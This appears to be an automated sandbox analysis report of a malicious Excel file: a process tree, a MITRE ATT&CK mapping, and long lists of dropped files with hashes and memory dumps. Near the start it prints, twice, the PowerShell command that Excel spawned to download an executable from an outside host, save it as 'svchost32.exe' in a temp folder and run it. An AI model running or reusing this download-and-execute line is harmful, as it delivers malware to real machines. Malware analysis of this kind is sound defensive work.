- Suspicious use of WriteProcessMemory
PID:3548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4352

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3476

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2748

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1144

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3496

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1208

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3876

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:720

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2672

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3956

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:872

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1504

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
471B

MD5
25130b6b45657cb11f662f01e0f6c91d

SHA1
bacf2ebb9bb0fdf1f6ea0d5d3e14677703931683

SHA256
c1d75f1b7f79757fec08c60a0175cdcb6cab70450f8be040e7b38ff46442db0b

SHA512
b57d6b246fc7e352e3c11a0dea472783994b6f0b5b2c227ef92bab8c7741db35b21c81e5259ccf7d2d06f7035608cbdae5eeba32242f41acf3cb92870a9bad75

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

Filesize
471B

MD5
109b0900e7476ed981f16034b342d64b

SHA1
7abe77549520d523d52115a4bc97d78357af6699

SHA256
97a89e0b088fcaf6c8e44cbb2b05701b99c4e12619539e91dd0303a58b282257

SHA512
1afc2e959942ff517a35f47b5cce3fc7dbc731a61922acc5c0522854e7aac6f428e467609c88f93db3ba01efe83f18a165c5e2b5f7497fbfeb6de0b8eb3f3e63

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
412B

MD5
6d9f81c1d16b067ce9d5a9e28292f9d7

SHA1
e004b2dee2b606a72455960f02e6746767007ff1

SHA256
62ff299b067158355ff2f899b13b8b82f2213b92c1fb16e1a51a097167bd2e65

SHA512
6af8b9c747f02752f8ec286e21fca96bc0a159a808876a99fad1466c352b0862b0a7fe042d15c60c618d608e4747456172088dac3605d38f802cc59186de499d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

Filesize
420B

MD5
f8d16a3b59b2942df15b49ae76e7e2ee

SHA1
9b2c4c0ae6edc499b86492cfb3f10d6ae468996c

SHA256
add5c2a172f1a1cb09e6cb4e9d9fac9d12ec917e1b078306378a66c757e08b31

SHA512
0350a5da40f6b669f9f9142837373bccb1894ddb951255009edad62821a139067b056cd929c83547c751a79d3452a00182e5b11620ce30707fb63c6a9b5a24ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\212D9554-6EEF-4F7C-884E-1361E669F39D

Filesize
171KB

MD5
cc14cb62c2b5615a407cbc5a8a968299

SHA1
81df7a80f0480c957c54767bd4ef5afd949c00ad

SHA256
433d7173d283727586ad0209f023b975061e37bd90fdd33838fd8debb7b77f53

SHA512
e584598eb6e4a3dda716fd89367afb3491af0b5c07d80166611994372b5db9576b4d35a0fb036852e2423a109c5b4361d23806a3186e16d2614834c22200b7bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

Filesize
717KB

MD5
0f623c5348eb7442cf1e8302db9b6024

SHA1
c6d41e75e2dd5407fbc2b13a79a9797e62bab4bf

SHA256
b0d33271c119634b7e4a3a68a2b9b5f38bb85940b4e31c7ea51d4074d0a2872e

SHA512
56376f05806acceb3d2ae71cec5afa8bb6ee9cd82f15f77e4f69474a61ed5c4c00cbc5d3b081522c629e63ec64d300309bca4b7905c5b9602dc11119785a8a7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
085ebd119f5fc6b8f63720fac1166ff5

SHA1
af066018aadec31b8e70a124a158736aca897306

SHA256
b8411fe8ec499074fca9047f6983d920279e84ddf3b02b2dd5c08cf07ec44687

SHA512
adb0522830db26123347cb485c43b156f5c888510e52091ba0fafc22b650ad29630c027746c920321905c28259dce7ff63dded93a79efddd5567c68312117875

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
188KB

MD5
be37fd37704ee8ee5386d5b3e7708fd1

SHA1
f93659b5fbdcdf032b8fe879212a8e32bd322700

SHA256
9274a4b56130c627ca6e5ca3cc911d5dd3f3c67b64209a6c2164d95c0a2c0ec6

SHA512
c103023f979c709042f76dc085238aa49f4757656f493803d87bf1974f9df42bc804b76dbe9864de831e2881eabece6a6f27ea15387fb891f8f148581339b830

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
e40e91872c3a1c8e770147f4904bb8b3

SHA1
66d658f9151a4a286c6cc53094147aae4d47097e

SHA256
5d601d85b6e0190401d6ec35ccc6afb6b3ed5931b335098f7a3c233ba83980a2

SHA512
3cf32d95ce97a08d931ca4064927591f45892c4fe60a5a115b542de71ca7c09e252a48fc67d40072b9c50f750b8d503043b41b7ab9821ff0e6f31c5491545206

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
bedf0a650600ddea1b1918e44c1536dd

SHA1
09a3c4e721c4a8cf4f8b7e6a1f32bb55686b4738

SHA256
fd2d7896989e179e33046fb89dccc5c7e2be55da1f2162bd4355ca6179f64ce5

SHA512
89d3f01f4947b3e1eb1dbedb3b85f0b06cc6b264ecc5c15686e266dc78fab84fd72a0403055002f7b33548aad93df198cf2204a5f27d2f8ebfdacce91f7e3b9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
ba20c503400fe425a3e29c0d6ca08b49

SHA1
8f6ece41c142cbda5f5b38f48194f9f93a38d228

SHA256
a90ce652b6cc1f2f31b2b77fe54c627819b5eff76f65ab194098c11b0a07b7b3

SHA512
9a14f57f503cc035eb92710d44c0c97c48701566b3e19e72af87570f81aa8869b5dc50fa7b1da2408a6d0cf3cd835c9263b503d3500a4c312f232fa59c86743e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
6e188a3f1491fafa2bdf2caebff837c3

SHA1
5b0d5f3b79f41af4c898221b42cadaacaddec713

SHA256
4d41d2e94b7ff16579f09f3c1f36aa2fb317fc4574322956bcfc456f832fe190

SHA512
f5966be28f98d02db0ba25506f6459d4f2ae1e88e1f57fdf294d4aa851fbfee5e3d378264e398f46c65740a65738f7fe58306cc353a8f7f01d1d1f3d329ab775

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
ca78c4f5a9ea9ead1ebd63bcd333dfb7

SHA1
ded11122e449bd75201624c7a94e90da981d4b07

SHA256
38d36f6a1c000b200da98c5409e90f9414517239a8e2c4aad6ffc7588fe18e6f

SHA512
877ab7559a3f12fd1b378b27372494b9cca0a20ab266fc3d67dd46d6d4cdba416f9ef591ae09d6d1ef56e221ebb727a646905fb355c010290e0e96bc2d1ff33f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
ea48dd1b1ce0a7487055ab87fd492ddc

SHA1
b7ba3da2c27af2445ffaaefe0c2353307180a6d0

SHA256
ee6a8b0f3a71f5e997b797f516692ca8bbd55bb8ab8fd32d47c116d5b4eaab31

SHA512
e83d1cc70e7e9d3bfc70504137194b206c50216f41e67c077eb4984247fb10e2e91e6aa52c8cda8b037c97f547eca9e19b3e50fde114acdec39b63472090ef82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
1c6159c711b544351a3439737cc7e955

SHA1
a109853818a227eeb0d4221eb97be515065909cd

SHA256
c5bc0158a01823905563237fd9ec75ddba3ed034549ee50e4f1528f63bfa5767

SHA512
34b79fac34f7832877cba9beeaef6335d9d91784463e311a4faea2bf00f95f6f5a4f792a1b14280eaaba716055740494f6be45ea72aaf50f0be6eff473314d94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
8b2a9dddfa196e44b82ba41106dc2e90

SHA1
7702656c9b5d2ab3495139db4ba35f1fd949c43a

SHA256
7ce9a250d13604b5a5712a535250877645eb1ff953aacfd100e5299d6d6e6b9f

SHA512
d174e6e6dcc16c1afd1a548b9bbe154c87e512d0644da1ed2d42303f79118f5565cbff629fb8d14fdffe09bbc0e1f366f6b37b8222d10db68cd15410d1b177e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
68eba3f1cc6f7431993e8ff61d7d8158

SHA1
b775a759c8fcc797e4b7de1d8293bd77885354f4

SHA256
26c91646ca9dbf8b1497ec64c4a3b9bc5b51361c245df1c733e3382718c08122

SHA512
ef38e320a0eb3ba2ca6845dcc8e22b2e83271303f2aba683829e8a7b98fef878d40fa0b229f5500a064796c32b6ef39a885dea1b80d2346923058ee8bfb741d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b05990a5fe5a6220aaf08f7f2bb407e9

SHA1
fa8f701d6c8cb9879eb3fa1492ea82bae9ff702b

SHA256
e3aec878ff223c645d1a9361812fb91458c4cf84692e555bff9946701664a531

SHA512
8301719373674532e06bf2c347ea89f3c80400ece0a41875e7c2e63b33de37f5dc741f1d60b56e269ff91f3306bf4e59f780e555fc1e599e86e987806a5b9e4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d638b00b54d0f44d1e3e5afda656f075

SHA1
da44b895e9919b59ae16e1936008fb8e27812902

SHA256
54e8de8388b9bc339ffc6a51fd4ce1ee7171f2716fc744781b4ff2841f651afa

SHA512
9dd739b320df8f10bbe6b280d1d74731cf6f451d155a882503872ad46e95dc48273f72795e2755276706e6139d2d6b9d6b1294ea68e0f0cf76cf48eeb515885b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1117b4dfe785027b5dc8969fa45993b1

SHA1
578194db00505a19e3a2481055607fdea674c81c

SHA256
6dbd3930c4930bba7e64fc686d41a980c46232c15d576858ce6a62707107733d

SHA512
e69c5037404db1441c695dad8b4445150da243af0fee9e7d645455bf717e9e08e6c31038c27422e93b35d7201da38d5793d05fa6b7ace0f16441e54efa2b78ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c48511c388f86e61d337ab5f4c6164b8

SHA1
011c18669dc15e82efc4882e50bd455a47cb3b9c

SHA256
0a8699bc2041be5532666756496e5587ead45af8364ec08a637540b74f74710c

SHA512
af3bb093186dda2e41779957732a873b84465ef8fb26a0d3d5e0ca97e957044df2b365cd2456b455f3decbecf6b9da0f85df1c30a27cba938173ca596bd00a2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
750958114c376aa381a0b047967398e8

SHA1
f4dea663d9464eab67dd228d6078d0701534ad11

SHA256
537491c639e595f04513413f0e87ace9a874a6ca204ca32ac8d07d9d92301783

SHA512
254c301197805670f651fe474828764af3ffc8ec38a3410c9d7c10e567152ffb20b653bba6cca2b413eee06b843885592bd6fbc3be26462aa566893d66f9e266

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a184a500f58b47e734ce5ddcc5590e4e

SHA1
e3cd46dd6265834f0e9b617d0b7a6ca9c586591e

SHA256
922dc3a0d84cab418132c60a6b3e0025bcf8356ad123ddd4c1029d2f3fd16c27

SHA512
1fce0f43b59428bf9da0d14293591a475bed7257309213d1d7db8871311cd9a535bf89fa991a347fac8357f0da94f6c736b3cdc538fe17e0f01d31d3202c84c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD3F2A.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hstxdnqc.tv3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost32.exe

Filesize
114B

MD5
e89f75f918dbdcee28604d4e09dd71d7

SHA1
f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

SHA256
6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

SHA512
8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
2KB

MD5
878e48e33fd9ba1ed9fb3498b8b9a349

SHA1
77b50231151a3ab03c27b5a7694f7eb88e601f79

SHA256
faf2098cd9f88435eb43d7b5955d86e1fc555897c3ec3237ab9bd778315da3cc

SHA512
e40c67dbb40007bd171428aea6b67dbcefbb8945fe7b7c98352b6722e037473768b4599d573881a754ca521d0cde234d3502d869b5df0bca6d04a8b9c65e1d8a

Download Submit
memory/212-36-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/212-37-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/212-128-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/212-40-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/212-42-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/212-125-0x00007FF7F80B0000-0x00007FF7F80C0000-memory.dmp

Filesize
64KB

Download
memory/212-126-0x00007FF7F80B0000-0x00007FF7F80C0000-memory.dmp

Filesize
64KB

Download
memory/212-43-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/212-35-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/212-34-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/212-127-0x00007FF7F80B0000-0x00007FF7F80C0000-memory.dmp

Filesize
64KB

Download
memory/212-124-0x00007FF7F80B0000-0x00007FF7F80C0000-memory.dmp

Filesize
64KB

Download
memory/1428-88-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-12-0x00007FF7F5AE0000-0x00007FF7F5AF0000-memory.dmp

Filesize
64KB

Download
memory/1428-13-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-87-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-78-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-0-0x00007FF7F80B0000-0x00007FF7F80C0000-memory.dmp

Filesize
64KB

Download
memory/1428-17-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-19-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-20-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-18-0x00007FF7F5AE0000-0x00007FF7F5AF0000-memory.dmp

Filesize
64KB

Download
memory/1428-16-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-14-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-9-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-15-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-6-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-10-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-11-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-8-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-7-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-2-0x00007FF7F80B0000-0x00007FF7F80C0000-memory.dmp

Filesize
64KB

Download
memory/1428-1-0x00007FF7F80B0000-0x00007FF7F80C0000-memory.dmp

Filesize
64KB

Download
memory/1428-5-0x00007FF7F80B0000-0x00007FF7F80C0000-memory.dmp

Filesize
64KB

Download
memory/1428-4-0x00007FF7F80B0000-0x00007FF7F80C0000-memory.dmp

Filesize
64KB

Download
memory/1428-848-0x00007FF838030000-0x00007FF838225000-memory.dmp

Filesize
2.0MB

Download
memory/1428-3-0x00007FF8380CD000-0x00007FF8380CE000-memory.dmp

Filesize
4KB

Download
memory/4896-54-0x000001B08B180000-0x000001B08B1A2000-memory.dmp

Filesize
136KB

Download